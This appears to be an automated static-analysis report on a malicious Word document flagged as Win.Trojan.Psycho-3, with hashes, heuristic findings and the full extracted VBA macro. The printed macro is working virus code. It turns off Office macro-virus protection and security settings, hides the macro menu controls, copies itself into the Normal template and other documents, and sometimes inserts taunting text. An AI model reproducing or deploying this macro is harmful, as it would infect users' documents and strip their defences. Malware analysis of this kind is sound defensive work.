Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f209823044633dec…

MALICIOUS

Office (OLE)

Size: 29.5 KB
Created: 2002-08-22 05:12:00
Authoring application: Microsoft Word 9.0
First seen: 2014-03-22
MD5: 77d12481a593f7e565016aee09b73b87
SHA-1: 74ea3cf967911019eb3457a0179c0ec9cde27d8e
SHA-256: f209823044633decc16f5a74e9549b03ed48c33f32bb6ec33bffea4185ebadf8
Risk score: 148

Heuristics (4)

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    If NTColLn > 0 Then NormTemp.CodeModule.DeleteLines 1, NTColLn
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3200 bytes
SHA-256: b9ce7dc0eaeb3fdfcfb373c2f351f0ff033c3e09b5e49482a6f5c2d15a68a227
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThissDocument"
Attribute VB_Base = "1Normal.ThissDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' 篷腓 螓 麒蜞屮?��?耱痤觇, 珥圜栩 螓 箧?礤祉钽?�囵桫�
' ?爨牮铖圊, ?��?羼螯 躅痤��.  饮 耧囫栩咫?扈疣, ?蝾朦觐
' 螓 漕腈屙 疣珙狃囹��� 赅?铐 疣犷蜞弪 ?箐嚯栩?陪? 愉圜?.
' 蒡铗 觐?磬镨襦??麒耱?镱珥噔囹咫�睇� 鲥??(觐礤黜
' 铐 礤祉钽?脲恹? 眍 � ?礤 耦徼疣腭� 磬镨襦螯 牮篁铋 忤痼
' ?怦?镱蹂痂螯, 镳铖蝾 铐 箜梓蝾驵弪  漯筱桢 忤痼覃 ...)
' ?磬桦篦�桁� 镱驽豚龛�扈 Extremist  :-)
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls(3).Enabled = False
CommandBars("Macro").Controls(4).Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
'CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTemp = NormalTemplate.VBProject.VBComponents.Item(1)
NTColLn = NormTemp.CodeModule.CountOfLines
ADColLn = ActDoc.CodeModule.CountOfLines
BGN = 2
If ActDoc.Name <> "ThissDocument" Or ADColLn < 4 Then DoAD = True
If NormTemp.Name <> "ThissDocument" Or NTColLn < 4 Then DoNT = True
If DoNT <> True And DoAD <> True Then GoTo NoToInfect
'
If DoNT = True Then
NormTemp.Name = "ThissDocument"
If NTColLn > 0 Then NormTemp.CodeModule.DeleteLines 1, NTColLn
Do While ActDoc.CodeModule.Lines(1, 1) = ""
ActDoc.CodeModule.DeleteLines 1
Loop
NormTemp.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ActDoc.CodeModule.Lines(BGN, 1) <> ""
NormTemp.CodeModule.InsertLines BGN, ActDoc.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
'
If DoAD = True Then
ActDoc.Name = "ThissDocument"
If ADColLn > 0 Then ActDoc.CodeModule.DeleteLines 1, ADColLn
Do While NormTemp.CodeModule.Lines(1, 1) = ""
NormTemp.CodeModule.DeleteLines 1
Loop
ActDoc.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NormTemp.CodeModule.Lines(BGN, 1) <> ""
ActDoc.CodeModule.InsertLines BGN, NormTemp.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
NoToInfect:
'Destruct
If Year(Now) > 2001 And Rnd > 0.95 Then
Selection.EndKey wdStory
Selection.TypeParagraph
Selection.TypeText "Hi LameR": Selection.TypeParagraph
Selection.TypeText "The Extremist has you..": Selection.TypeParagraph
Selection.LanguageID = wdRussian
End If
'
If NTColLn <> 0 And ADColLn = 0 And (InStr(1, ActiveDocument.Name, "念牦戾眚") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "念牦戾眚") = True) Then
ActiveDocument.Saved = True: End If
End Sub